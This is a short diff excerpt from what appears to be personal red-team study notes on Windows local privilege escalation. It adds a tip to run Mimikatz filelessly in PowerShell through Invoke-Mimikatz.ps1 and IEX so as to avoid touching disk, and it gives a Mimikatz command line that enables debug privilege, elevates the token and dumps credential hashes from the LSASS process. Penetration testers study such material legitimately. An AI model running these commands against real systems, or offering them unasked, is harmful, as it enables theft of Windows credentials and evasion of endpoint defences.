Print3M/print3m.github.io/_notes/windows/local/rt/privilege-escalation.md

 LSASS process might have additional security layer called _LSA protection_.
 It can be omitted with tools like **Mimikatz**.

+> **NOTE**: Usually it's worth to run Mimikatz using Powershell without touching a disk. `Invoke-Mimikatz.ps1` script run in a shell using `IEX` is a great option to do this.

 ```powershell
 mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "exit"
 ```